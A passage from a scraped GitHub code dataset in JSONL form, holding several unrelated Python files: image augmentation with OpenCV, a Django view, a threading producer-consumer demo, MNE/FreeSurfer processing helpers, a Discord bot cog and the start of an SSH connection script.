itertools.islice\n\nlist(itertools.islice(g1[1], 5))\n\n\n\nfname = \"sorted_data.csv\"\nwith open(fname) as f:\n reader = csv.reader(f)\n grouped = itertools.groupby(reader, key = lambda x: x[0])\n result = {}\n for g in grouped:\n key = g[0]\n values = (float(x[1]) for x in g[1])\n result[key] = numeric_range(values)\n\n\n# Alternatively - yuck.\n#fname = \"sorted_data.csv\"\n#with open(fname) as f:\n# reader = csv.reader(f)\n# row = next(reader)\n# key = row[0]\n# cur_max = cur_min = row[1]\n# result = {key: {\"max\": cur_max, \"min\": cur_min}}\n# for g in grouped:\n# key = g[0]\n# values = (float(x[1]) for x in g[1])\n# result[key] = numeric_range(values)\n\n\n\n#list(g1[1])\n\n\n\nif __name__ == \"__main__\":\n print(\"Testing\")\n import doctest\n doctest.testmod()\n","repo_name":"clarkfitzg/sta141c-winter19","sub_path":"examples/grouper.py","file_name":"grouper.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"15293213529","text":"import os\nimport uuid\nimport random\nimport cv2\nfrom functions import *\nimport numpy as np\n\n\n\n#BLUR\ndef blur_image(img, output_directory=\"output\"): \n\n width = random.randint(1, 50) #w, h are filter value\n height = random.randint(1, 50)\n\n #blur image \n blurred_image = cv2.blur(img, ksize=(width, height))\n\n # Make a random name for it\n name = str(uuid.uuid4())[:8]\n\n #save image with random name into output folder\n output_path = os.path.join(output_directory, f\"{name}.jpg\")\n cv2.imwrite(output_path, blurred_image)\n\n return blurred_image\n\n\n\n#CROP\ndef crop_image(image, output_directory=\"output\"):\n # Get image dimensions\n width, height = image.shape[:2]\n\n # Determine random coordinates for the top-left corner of the cropped region\n x = random.randint(0, width // 2)\n y = random.randint(0, height // 2)\n\n # Crop the image\n cropped_image = image[y:y + height // 2, x:x + width // 2]\n\n # Generate a random name for the output image\n name = str(uuid.uuid4())[:8] + \".jpg\"\n output_image_path = os.path.join(output_directory, name)\n\n # Save the cropped image\n cv2.imwrite(output_image_path, cropped_image)\n\n return cropped_image\n\n\n\n#ROTATE\ndef rotate_image(img, output_directory='output'):\n # Generate a random rotation angle between 0 and 360 degrees\n rotate_angle = random.randint(0, 360)\n # Rotate the image\n rows, cols = img.shape[:2]\n M = cv2.getRotationMatrix2D((cols / 2, rows / 2), rotate_angle, 1)\n rotated_img = cv2.warpAffine(img, M, (cols, rows))\n\n # Generate a random name for the output image\n name = str(uuid.uuid4())[:8] + \".jpg\"\n\n # Save the rotation variation image to the output directory\n output_path = os.path.join(output_directory, name)\n cv2.imwrite(output_path, rotated_img)\n\n return rotated_img\n\n\n\n#FLIP\ndef flip_image(img,output_directory='output'):\n # Generate a random flip direction\n flip_direction = random.choice(['horizontal', 'vertical'])\n\n # Flip the rotated image\n if flip_direction == 'horizontal':\n flipped_img = cv2.flip(img, 1)\n else:\n flipped_img = cv2.flip(img, 0)\n\n # Generate a random name for the output image\n name = str(uuid.uuid4())[:8] + \".jpg\"\n\n # Save the flip variation image to the output directory\n output_path = os.path.join(output_directory, name)\n cv2.imwrite(output_path, flipped_img)\n\n return flipped_img\n\n\n\n#EDGE DETECTION\ndef find_edge(img, output_directory=\"output\"):\n\n #blur image \n blurred_image = cv2.Canny(img, 100, 200)\n\n #random name for it\n name = str(uuid.uuid4())[:8]\n\n #save image with random name into output folder\n output_path = os.path.join(output_directory, f\"{name}.jpg\")\n cv2.imwrite(output_path, blurred_image)\n\n return blurred_image\n\n\n\n#GRAY SCALE\ndef gray_scale(image, output_folder=\"output\"):\n # Convert the image to grayscale\n grayscale_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Generate a random name for the grayscale image\n new_filename = str(uuid.uuid4())[:8] + \".jpg\"\n\n # Save the grayscale image\n output_path = os.path.join(output_folder, new_filename)\n cv2.imwrite(output_path, grayscale_image)\n\n return grayscale_image\n\ndef change_color_image(img, output_folder=\"output\"):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n # Tạo filter ngẫu nhiên\n filt = random.randint(1,20)\n\n if filt == 1:\n # Lọc tươi mới\n img = np.array(img * [1.1, 1.2, 0.9], dtype=np.uint8)\n\n elif filt == 2:\n # Lọc trong suốt\n img = np.array(img * [0.9, 1.1, 1.1], dtype=np.uint8)\n \n elif filt == 3:\n # Lọc ấm áp\n img = np.array(img * [1.2, 1.1, 0.9], dtype=np.uint8)\n\n elif filt == 4:\n\n img[0,:,:] = [255,255,255]\n img[:,0,:] = [255,255,255]\n img[-1,:,:] = [255,255,255]\n img[:,-1,:] = [255,255,255]\n img[1:-1,1:-1,:] = np.array(img[1:-1,1:-1,:] * [0.8,0.8,0.8], dtype=np.uint8)\n\n elif filt == 5:\n # Lọc màu vàng hiện đại\n img = np.array(img * [1.1, 1.1, 0.8], dtype=np.uint8)\n\n elif filt == 6:\n # Lọc nóng\n img = np.array(img * [1.1, 0.9, 0.9], dtype=np.uint8)\n\n elif filt == 7:\n # Lọc cổ điển\n img = np.array(img * [0.9, 0.9, 1.2], dtype=np.uint8)\n\n elif filt == 8:\n # Lọc mùa xuân \n img = np.array(img * [1.1, 1.2, 1], dtype=np.uint8)\n\n elif filt == 9:\n # Lọc sương mù\n img = np.array(img * [0.6, 0.6, 0.6], dtype=np.uint8)\n\n elif filt == 10:\n # Lọc mùa thu\n img = np.array(img * [1.2, 1, 0.8], dtype=np.uint8)\n\n elif filt == 11:\n # Lọc sharpen\n img = np.array(img * [1.5, 1.5, 1.5], dtype=np.uint8)\n\n elif filt == 12:\n # Lọc nhiễu \n noise = np.random.randint(-50,50,img.shape)\n img = img + noise\n img = np.clip(img, 0, 255)\n\n elif filt == 13:\n # Lọc tông xanh\n img = np.array(img * [1, 1.5, 1.5], dtype=np.uint8)\n\n elif filt == 14:\n # Lọc đồng quê\n img = np.array(img * [0.9, 0.9, 1.1], dtype=np.uint8)\n\n elif filt == 15:\n # Lọc hoàng hôn\n img = np.array(img * [1.1, 0.8, 0.9], dtype=np.uint8)\n\n elif filt == 16:\n # Lọc thành phố\n img = np.array(img * [0.8, 0.8, 1.2], dtype=np.uint8)\n\n elif filt == 17:\n # Lọc thực phẩm\n img = np.array(img * [1.2, 0.9, 0.8], dtype=np.uint8)\n\n elif filt == 18:\n # Lọc khu rừng\n img = np.array(img * [0.9, 1.1, 1], dtype=np.uint8)\n\n elif filt == 19:\n # Lọc mùa đông\n img = np.array(img * [1.1, 0.8, 1.2], dtype=np.uint8)\n\n elif filt == 20:\n # Lọc mùa hè\n img = np.array(img * [1.2, 0.9, 0.8], dtype=np.uint8)\n\n # Tạo tên ngẫu nhiên cho file ảnh\n new_name = str(uuid.uuid4())[:8] + \".jpg\"\n\n # Lưu ảnh với tên mới \n output_path = os.path.join(output_folder, new_name)\n cv2.imwrite(output_path, cv2.cvtColor(img, cv2.COLOR_RGB2BGR))\n\n return img","repo_name":"sinhvienfpt/image_editting_tool","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30574514482","text":"from django.shortcuts import render\nfrom django.views import View\n\n\nclass CertyfikatyView(View):\n def get(self, request):\n context = {\n 'title': 'Certyfikaty',\n 'description': 'Jesteśmy wykwalifikowaną firmą montującą kamery, alarmy oraz inne systemy.',\n 'keywords': '',\n }\n return render(request, 'sites/web/certyfikaty.html', context)\n","repo_name":"Maniek2341/gsmmonit","sub_path":"website/views/certyfikaty_view.py","file_name":"certyfikaty_view.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42353927582","text":"#En una determinada empresa, sus empleados son evaluados al final de cada año. Los puntos que pueden obtener en la evaluación comienzan en 0.0 y pueden ir aumentando, traduciéndose en mejores beneficios. Los puntos que pueden conseguir los empleados pueden ser 0.0, 0.4, 0.6 o más, pero no valores intermedios entre las cifras mencionadas. A continuación se muestra una tabla con los niveles correspondientes a cada puntuación. La cantidad de dinero conseguida en cada nivel es de 2.400€ multiplicada por la puntuación del nivel.\n\ndef comprobarNivel(points):\n if points == 0.0 or points == 0.4 or points >= 0.6:\n return True\n else:\n return False\n\n\ndef pruebaNivel(points):\n if points == 0.0:\n return \"Inaceptable\"\n elif points == 0.4:\n return \"Aceptable\"\n else:\n return \"Meritorio\"\n\n\n\n\n\ndef main():\n \n puntos = float(input(\"Dime tu nivel, 0.0, 0.4, 0.6 o más \"))\n \n if comprobarNivel(puntos) == True:\n print (pruebaNivel(puntos) , (2400 * puntos))\n else:\n print(\"**ERROR**\")\n\nif __name__==\"__main__\":\n main()\n\n#perfe","repo_name":"IES-Rafael-Alberti/1dawb-ejercicios-u2-Eperyaq","sub_path":"src/ejercicios2_1_8.py","file_name":"ejercicios2_1_8.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38633609118","text":"from __future__ import print_function\nimport os\nimport sys\nimport subprocess\n# import subprocess\n# import numpy as np\n# from mne.preprocessing.maxfilter import apply_maxfilter\n\nCLOBBER = False\nFAKE = False\nVERBOSE = True\n\n# ENH: install \"official\" version of stormdb on isis/hyades\npath_to_stormdb = '/usr/local/common/meeg-cfin/stormdb'\n# path_to_stormdb = \"/volatile/mje/meeg-cfin/stormdb\"\nsys.path.append(path_to_stormdb)\n\nfrom stormdb.access import Query\n\n# path to submit_to_isis\ncmd = \"/usr/local/common/meeg-cfin/configurations/bin/submit_to_isis\"\nproj_code = \"MINDLAB2015_MEG-CorticalAlphaAttention\"\n\ndb = Query(proj_code)\nproj_folder = os.path.join('/projects', proj_code)\nscratch_folder = os.path.join(proj_folder, 'scratch/')\nfs_subjects_dir = os.path.join(scratch_folder, 'fs_subjects_dir/')\n\nsubjects_dir = os.path.join(scratch_folder, 'fs_subjects_dir')\nscript_dir = proj_folder + '/scripts/'\n\nincluded_subjects = db.get_subjects()\n\n\ndef make_symbolic_links(subject, subjects_dir):\n \"\"\"Make symblic links between FS dir and subjects_dir.\n\n Parameters\n ----------\n fname : string\n The name of the subject to create for\n subjects_dir : string\n The subjects dir for FreeSurfer\n \"\"\"\n\n make_links = \"ln -s fs_%s/* .\" % subject[:4]\n os.chdir(fs_subjects_dir + subject[:4])\n subprocess.call([cmd, \"1\", make_links])\n\n\ndef convert_surfaces(subject, subjects_dir):\n \"\"\"Convert the SimNIBS surface to FreeSurfer surfaces.\n\n Parameters\n ----------\n subject : string\n The name of the subject\n subjects_dir : string\n The subjects dir for FreeSurfer\n \"\"\"\n convert_csf = \"meshfix csf.stl -u 10 --vertices 4098 --fsmesh\"\n convert_skull = \"meshfix skull.stl -u 10 --vertices 4098 --fsmesh\"\n convert_skin = \"meshfix skin.stl -u 10 --vertices 4098 --fsmesh\"\n\n os.chdir(fs_subjects_dir + subject[:4] + \"/m2m_%s\" % subject[:4])\n subprocess.call([cmd, \"1\", convert_csf])\n subprocess.call([cmd, \"1\", convert_skull])\n subprocess.call([cmd, \"1\", convert_skin])\n\n\ndef copy_surfaces(subject, subjects_dir):\n \"\"\"Copy the converted FreeSurfer surfaces to the bem dir.\n\n Parameters\n ----------\n subject : string\n The name of the subject\n subjects_dir : string\n The subjects dir for FreeSurfer\n \"\"\"\n os.chdir(fs_subjects_dir + subject[:4] + \"/m2m_%s\" % subject[:4])\n copy_inner_skull = \"cp -f csf_fixed.fsmesh \" + subjects_dir + \\\n \"/%s/bem/inner_skull.surf\" % subject[:4]\n copy_outer_skull = \"cp -f skull_fixed.fsmesh \" + subjects_dir + \\\n \"/%s/bem/outer_skull.surf\" % subject[:4]\n copy_outer_skin = \"cp -f skin_fixed.fsmesh \" + subjects_dir + \\\n \"/%s/bem/outer_skin.surf\" % subject[:4]\n\n subprocess.call([cmd, \"1\", copy_inner_skull])\n subprocess.call([cmd, \"1\", copy_outer_skull])\n subprocess.call([cmd, \"1\", copy_outer_skin])\n\n os.chdir(fs_subjects_dir + subject[:4] + \"/bem\")\n convert_skin_to_head = \"mne_surf2bem --surf outer_skin.surf --fif %s-head.fif --id 4\" % subject[:4]\n subprocess.call([cmd, \"1\", convert_skin_to_head])\n\n\ndef setup_mne_c_forward(subject):\n setup_forward = \"mne_setup_forward_model --subject %s --surf --ico -6\" %subject[:4]\n subprocess.call([cmd, \"1\", setup_forward])\n\n\nfor subject in included_subjects[3:5]:\n make_symbolic_links(subject, fs_subjects_dir)\n \nfor subject in included_subjects[3:5]:\n convert_surfaces(subject, fs_subjects_dir) \n\nfor subject in included_subjects[3:5]:\n copy_surfaces(subject, fs_subjects_dir) \n\nfor subject in included_subjects[3:5]:\n setup_mne_c_forward(subject) \n\n","repo_name":"MadsJensen/malthe_alpha_project","sub_path":"simnibs_functions.py","file_name":"simnibs_functions.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20367029659","text":"from threading import Thread, Lock, Semaphore\r\nfrom time import sleep\r\nfrom random import randint\r\n\r\nBUFFER_SIZE = 15\r\nNUM_ITEMS = 20\r\n\r\nclass Productor(Thread):\r\n \r\n def __init__(self, mutex, sem_huecos, sem_items, buffer,index_p, index_c):\r\n Thread.__init__(self)\r\n self.mutex = mutex\r\n self.sem_huecos = sem_huecos\r\n self.sem_items = sem_items\r\n self.buffer = buffer\r\n self.index_c = index_c\r\n self.index_p = index_p\r\n\r\n def run(self):\r\n for i in range(NUM_ITEMS):\r\n item = randint(1,100) \r\n sem_huecos.acquire()\r\n mutex.acquire()\r\n self.buffer[self.index_p] = item\r\n self.index_p = (self.index_p + 1) % BUFFER_SIZE\r\n print(\"PRODUCTOR:\", item, self.buffer)\r\n mutex.release()\r\n sem_items.release()\r\n sleep(randint(0,1))\r\n\r\nclass Consumidor(Thread):\r\n \r\n def __init__(self, mutex, sem_huecos, sem_items, buffer,index_p, index_c):\r\n Thread.__init__(self)\r\n self.mutex = mutex\r\n self.sem_huecos = sem_huecos\r\n self.sem_items = sem_items\r\n self.buffer = buffer\r\n self.index_c = index_c\r\n self.index_p = index_p\r\n\r\n def run(self):\r\n for i in range(NUM_ITEMS):\r\n sem_items.acquire()\r\n mutex.acquire()\r\n item = self.buffer[self.index_c]\r\n self.buffer[self.index_c] = 0\r\n self.index_c = (self.index_c + 1) % BUFFER_SIZE \r\n print('CONSUMIDOR:', item, self.buffer)\r\n mutex.release()\r\n sem_huecos.release() \r\n sleep(randint(1,3))\r\n\r\n\r\nif __name__ == '__main__':\r\n index_p = index_c = 0\r\n mutex = Lock()\r\n sem_items = Semaphore(0) \r\n sem_huecos = Semaphore(BUFFER_SIZE)\r\n buffer = [0] * BUFFER_SIZE\r\n\r\n p = Productor(mutex, sem_huecos, sem_items, buffer, index_p, index_c)\r\n p.start()\r\n\r\n c = Consumidor(mutex, sem_huecos, sem_items, buffer, index_p, index_c)\r\n c.start()\r\n\r\n p.join()\r\n c.join()","repo_name":"aldebarran22/curso_santander_1","sub_path":"productor_consumidor.py","file_name":"productor_consumidor.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"40316371233","text":"import discord\nfrom discord.ext import commands\n\nclass General(commands.Cog): \n def __init__(self,bot):\n self.bot=bot\n\n @commands.command()\n async def exp(self, ctx):\n await ctx.send(\"https://cdn.discordapp.com/attachments/637264326368952323/807527453303898152/exp.png\")\n \n @commands.command(aliases=['talent'])\n async def weekly(self, ctx):\n await ctx.send(\"https://media.discordapp.net/attachments/840489159642841118/855088556836782120/Talent_eng.png\")\n\n @commands.command()\n async def gi2021(self, ctx):\n await ctx.send(\"https://cdn.discordapp.com/attachments/812186655783780352/865075703983898644/Frame_11.png\")\n \ndef setup(bot):\n bot.add_cog(General(bot))\n","repo_name":"LuminetteBourgeons/Childe","sub_path":"genshin impact/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"66"} +{"seq_id":"71377320849","text":"from model import Cep\nimport app_util.cep_request as viacep\nfrom persistence import db\n\n\ndef cep_handler(cep_from_client):\n\n\tnum_cep = cep_from_client.replace('-', '')\n\n\tcep = query_cep_by_id(num_cep)\n\n\tif cep is None:\n\t\tnew_cep = viacep.get_cep(num_cep)\n\t\t\n\t\tdb.session.add(new_cep)\n\t\tdb.session.commit()\n\t\treturn new_cep\n\n\treturn cep\n\ndef query_cep_by_id(cep):\n\treturn Cep.query.filter_by(numero=cep).first()\n\ndef insert_cep(cep):\n\tdb.session.add(cep)\n\tdb.session.commit()\n\tdb.session.close()\n","repo_name":"bopopescu/Python_Personal_Projects","sub_path":"erp_confere/src/test/erp_confere/services/cep_service.py","file_name":"cep_service.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5746121443","text":"try:\n a = 20\n b = 0\n print(a/b)\nexcept ZeroDivisionError:\n print('there is a divide by 0 error')\n\ntry:\n a = 0\n b = 0\n print (a/b)\nexcept:\n print('second example')\nfinally:\n print('the code continues')\n\n\n def divide(a,b):\n try:\n return a/b\n except ZeroDivisionError:\n print(\"There is a divide by zero error\")\n return 0\n\n\n x = float(input('Enter a number'))\n y = float(input('Enter value by which you want to divide the number'))\n result = divide(x, y)\n print(result)\n","repo_name":"CEsarABC/Python-CI-","sub_path":"Python fundamentals/exception_handling.py","file_name":"exception_handling.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16128391567","text":"import cv2 as cv\r\nimport pytesseract \r\nfrom translator import Translations\r\n\r\nclass Do_Ocr():\r\n def __init__(self,path) -> None:\r\n self.img_path = path\r\n pytesseract.pytesseract.tesseract_cmd = 'C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe'\r\n \r\n def get_text(self)-> str:\r\n img = cv.imread(self.img_path,cv.IMREAD_GRAYSCALE)\r\n x,th1 = cv.threshold(img,127,255,cv.THRESH_BINARY)\r\n #img = cv.cvtColor(img, cv.COLOR_BGR2RGB) \r\n #x,th1 = cv.threshold(img,127,255,cv.THRESH_BINARY)\r\n output_text = pytesseract.image_to_string(th1) \r\n '''if True :#Translations.trans_late()\r\n tslate = Translations(output_text,'0b57146c3d8693bf6736a6ec24ba004e')\r\n return tslate.trans_late('en')'''\r\n return output_text\r\n \r\n def box_text(self):\r\n img = cv.imread(self.img_path)\r\n Himg,Wimg,Temp = img.shape\r\n boxes_list = pytesseract.image_to_boxes(img)\r\n for b in boxes_list.splitlines():\r\n #print(b)\r\n b = b.split(' ')\r\n #print(b)\r\n x,y,w,h = int(b[1]),int(b[2]),int(b[3]),int(b[4])\r\n cv.rectangle(img,(x,Himg-y),(w,Himg-h),(0,0,255),1)\r\n cv.putText(img,b[0],(x,Himg-y+25),cv.FONT_HERSHEY_COMPLEX_SMALL,1,(100,100,100),2)\r\n cv.imshow('Result',img)\r\n cv.waitKey(0)\r\n cv.destroyAllWindows()\r\n\r\n\r\n","repo_name":"NinadJoshi382/Image2Text_Translation","sub_path":"img_parser.py","file_name":"img_parser.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6481892858","text":"import datetime\n\nimport pandas as pd\nimport pyarrow as pa\nimport pyarrow.compute as pc\nfrom datetime import datetime\nimport edgar\nfrom edgar._rich import *\nfrom edgar.core import (decode_content,\n get_identity,\n set_identity,\n ask_for_identity,\n display_size,\n Result,\n filter_by_date,\n http_client,\n InvalidDateException,\n client_headers,\n CRAWL, CAUTION, NORMAL,\n download_file,\n extract_dates,\n get_text_between_tags)\nimport re\nfrom rich.table import Table\nimport pytest\n\n\ndef test_decode_content():\n text = \"Kyle Walker vs Mbappe\"\n assert decode_content(text.encode('utf-8')) == text\n assert decode_content(text.encode('latin-1')) == text\n\n\ndef test_decode_latin1():\n text = \"Mbappe vs Messi\"\n assert decode_content(text.encode(\"latin-1\")) == text\n\n\ndef test_get_identity():\n identity = get_identity()\n assert identity\n\n\ndef test_get_identity_environment_variable_not_set(monkeypatch):\n monkeypatch.setattr('builtins.input', lambda: \"Tom Holland tholland@restishistory.com\")\n monkeypatch.delenv(\"EDGAR_IDENTITY\", raising=False)\n identity = get_identity()\n assert identity == \"Tom Holland tholland@restishistory.com\"\n\n\ndef test_set_identity():\n old_identity = get_identity()\n set_identity(\"Mike Tirico mtirico@cal.com\")\n assert get_identity() == \"Mike Tirico mtirico@cal.com\"\n set_identity(old_identity)\n\n\ndef test_ask_for_identity(monkeypatch):\n monkeypatch.setattr('builtins.input', lambda: \"Tom Holland tholland@restishistory.com\")\n identity = ask_for_identity()\n assert identity == \"Tom Holland tholland@restishistory.com\"\n\n\ndef test_ask_for_identity_prompt(monkeypatch, capsys):\n monkeypatch.setattr('builtins.input', lambda: \"Tom Holland tholland@restishistory.com\")\n identity = ask_for_identity(\"Who are you\")\n assert identity == \"Tom Holland tholland@restishistory.com\"\n captured = capsys.readouterr()\n assert 'Who are you' in captured.out\n\n\ndef test_ask_for_identity_keyboard_interrupt(monkeypatch):\n def input_interrupt():\n raise KeyboardInterrupt()\n\n monkeypatch.setattr('builtins.input', input_interrupt)\n with pytest.raises(TimeoutError) as exc:\n ask_for_identity(\"Who are you\")\n\n\ndef test_get_header():\n assert client_headers()['User-Agent'] == get_identity()\n\n\ndef test_download_index_file():\n xbrl_gz = download_file('https://www.sec.gov/Archives/edgar/full-index/2021/QTR1/xbrl.gz')\n assert isinstance(xbrl_gz, bytes)\n assert len(xbrl_gz) > 10000\n\n xbrl_idx = download_file('https://www.sec.gov/Archives/edgar/full-index/2021/QTR1/xbrl.idx')\n assert isinstance(xbrl_idx, str)\n\n\ndef test_df_to_rich_table():\n df = pd.read_csv('data/cereal.csv')\n table: Table = df_to_rich_table(df)\n assert table\n assert len(table.rows) == 21\n\n\ndef test_repr_rich():\n df = pd.read_csv('data/cereal.csv',\n usecols=['name', 'mfr', 'type', 'calories', 'protein', 'fat', 'sodium'])\n table: Table = df_to_rich_table(df)\n value = repr_rich(table)\n assert '100% Bran' in value\n\n\ndef test_result():\n result = Result.Ok(value=1)\n assert result.success\n assert not result.failure\n assert result.value == 1\n\n assert \"Success\" in str(result)\n\n result = Result.Fail(\"Does not work\")\n assert result.failure\n assert not result.success\n assert not result.value\n assert result.error == \"Does not work\"\n assert \"Failure\" in str(result)\n\n\ndef test_display_size():\n assert display_size(117000) == \"114.3 KB\"\n assert display_size(1170000) == \"1.1 MB\"\n assert display_size(\"117000\") == \"114.3 KB\"\n assert display_size(\"1170000\") == \"1.1 MB\"\n assert display_size(None) == \"\"\n assert display_size(\"aaa\") == \"\"\n assert display_size(\"\\x01\") == \"\"\n\n\ndef test_detect_charset():\n url = 'https://www.sec.gov/Archives/edgar/data/1089113/000165495420002467/a7664f.htm'\n client = http_client()\n r = client.get(url)\n print(r.encoding)\n assert r.encoding == 'ascii'\n\n\ndef test_download_image():\n url = 'https://www.sec.gov/Archives/edgar/data/1640147/000164014722000023/snow-20220131_g1.jpg'\n client = http_client()\n r = client.get(url)\n print(r.encoding)\n print(r.content)\n download_file(url)\n\n\ndef test_extract_dates():\n assert extract_dates(\"2022-03-04\") == (datetime.strptime(\"2022-03-04\", \"%Y-%m-%d\"), None, False)\n assert extract_dates(\"2022-03-04:\") == (datetime.strptime(\"2022-03-04\", \"%Y-%m-%d\"), None, True)\n assert extract_dates(\":2022-03-04\") == (None, datetime.strptime(\"2022-03-04\", \"%Y-%m-%d\"), True)\n assert extract_dates(\"2022-03-04:2022-04-04\") == (\n datetime.strptime(\"2022-03-04\", \"%Y-%m-%d\"), datetime.strptime(\"2022-04-04\", \"%Y-%m-%d\"), True)\n\n # Invalid dates\n with pytest.raises(InvalidDateException):\n extract_dates(\"2022-44-44\")\n\n\ndef test_invalid_date_exception():\n exception = InvalidDateException(\"Something went wrong\")\n assert str(exception) == \"Something went wrong\"\n\n\ndef test_filter_by_date():\n arrays = [pa.array(['a', 'b', 'c']),\n pa.array([3, 2, 1]),\n pc.cast(pc.strptime(pa.array(['2013-04-24', '2015-12-03', '2017-08-10']), '%Y-%m-%d', 'us'), pa.date32())]\n\n # arrays[2] = pc.cast(pc.strptime(arrays[2], '%Y-%m-%d', 'us'), pa.date32())\n table = pa.Table.from_arrays(arrays,\n names=['item', 'value', 'date']\n )\n\n assert len(filter_by_date(table, '2013-04-24', 'date')) == 1\n assert len(filter_by_date(table, '2013-04-24:2016-04-24', 'date')) == 2\n\n # Use datetime to filter by date\n assert len(filter_by_date(table, datetime.strptime('2013-04-24', '%Y-%m-%d'), 'date')) == 1\n\n\ndef test_dataframe_pager():\n from edgar.core import DataPager\n import numpy as np\n df = pd.DataFrame({'A': np.random.randint(0, 100, size=150),\n 'B': np.random.randint(0, 100, size=150)})\n pager = DataPager(df, 100)\n # Test getting the first page\n first_page = pager.current()\n assert len(first_page) == 100\n\n # Test getting the next page\n second_page = pager.next()\n assert len(second_page) == 50\n assert all(first_page.iloc[-1] != second_page.iloc[0])\n\n # Test getting the previous page\n prev_page = pager.previous()\n assert len(prev_page) == 100\n assert all(first_page == prev_page)\n\n # Test going to the next page again\n next_page = pager.next()\n assert len(next_page) == 50\n assert all(second_page == next_page)\n\n # Test going to the next page when there is no more page\n last_page = pager.next()\n assert last_page is None\n\n\ndef test_settings():\n assert edgar.edgar_mode.max_connections == 10\n\n edgar.edgar_mode = CAUTION\n assert edgar.edgar_mode.max_connections == 5\n\n edgar.edgar_mode = CRAWL\n assert edgar.edgar_mode.max_connections == 2\n\n\ndef test_get_text_between_tags():\n text = get_text_between_tags(\n 'https://www.sec.gov/Archives/edgar/data/1009672/000156459018004771/0001564590-18-004771.txt',\n 'SEC-HEADER')\n print(text)\n assert 'ACCESSION NUMBER:\t\t0001564590-18-004771' in text\n","repo_name":"dgunning/edgartools","sub_path":"tests/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"66"} +{"seq_id":"44418341545","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass AlexNet(nn.Module):\n def __init__(self, num_classes=10):\n super().__init__()\n self.name = 'alexnet'\n self.conv1 = nn.Conv2d(3,96,kernel_size=(11,11),stride=4,padding=2)\n self.pool = nn.MaxPool2d((3,3),stride=2)\n self.conv2 = nn.Conv2d(96,256,kernel_size=(5,5),stride=1,padding=2)\n self.conv3 = nn.Conv2d(256,384,kernel_size=(3,3),stride=1,padding=1)\n self.conv4 = nn.Conv2d(384,384,kernel_size=(3,3),stride=1,padding=1)\n self.conv5 = nn.Conv2d(384,256,kernel_size=(3,3),stride=1,padding=1)\n self.fc1 = nn.Linear(6*6*256,4096)\n self.fc2 = nn.Linear(4096,4096)\n self.fc3 = nn.Linear(4096,num_classes)\n \n\n def forward(self,x):\n x = F.relu(self.conv1(x))\n x = self.pool(x)\n x = F.relu(self.conv2(x))\n x = self.pool(x)\n x = F.relu(self.conv3(x))\n x = F.relu(self.conv4(x))\n x = F.relu(self.conv5(x))\n x = self.pool(x)\n x = x.view(-1, 256 * 6 * 6)\n x = F.relu(self.fc1(x))\n x = F.dropout(x, p=0.5, training=self.training)\n x = F.relu(self.fc2(x))\n x = F.dropout(x, p=0.5, training=self.training)\n x = self.fc3(x)\n return x\n\nif __name__ == '__main__':\n net = AlexNet()\n print(net)\n","repo_name":"tony-ch/pytorch_practice","sub_path":"net/alexnet.py","file_name":"alexnet.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32273478499","text":"\"\"\"\nDicionario em python\nlista que possui chave valor\n\"\"\"\n\n# d1 = {'chave1':'valor da chave'}\n# d1 = dict(chave1='valor da chave', chave2='valor da outra chave')\n# d1['nova_chave'] = 'valor da chave'\n# d1 = {\n# 'str': 'valor',\n# \"123\": 'Outro valor',\n# \"chave3\": 'Tupla'\n# }\n\n# d1.update({'str': 'nova_valor'})\n# d1.pop('chave3')\n# del d1['str']\n#\n# print(123 in d1.keys())\n# print('Tupla' in d1.values())\n#\n# print(len(d1))\n\n# if d1.get('nomedachave') is not None:\n# print(d1.get('nomedachave'))\n\ncliente = {\n 'cliente1': {\n 'nome': 'Luiz',\n 'sobrenome': 'Otavio'\n },\n 'cliente2': {\n 'nome': 'Kaique',\n 'sobrenome': 'Gomes'\n }\n}\n\nfor clientes_k, clientes_v in cliente.items():\n print(f'Exibindo {clientes_k}')\n for dados_k, dados_v in clientes_v.items():\n print(f'\\t{dados_k} = {dados_v}')\n\nimport copy\n\nc = copy.deepcopy(cliente)\n","repo_name":"kaiqkt/learning-python","sub_path":"procedural-programming/aula7.py","file_name":"aula7.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8101926672","text":"'''\nScript to connect to the virtual machines through the gateways node1 and node2\njumpssh: blocking\nhttps://pypi.org/project/jumpssh/\n\nfabric: non blocking implementation with threads. Did not work.\nhttps://www.fabfile.org/index.html\n\nparallel ssh: non blocking\n\nWilliam Orozco\nworozco at ucdavis dot edu\nDecember 2021\n'''\n\n\n'''\n====================================\nimport libraries\n====================================\n'''\nimport json\nimport multiprocessing\nimport 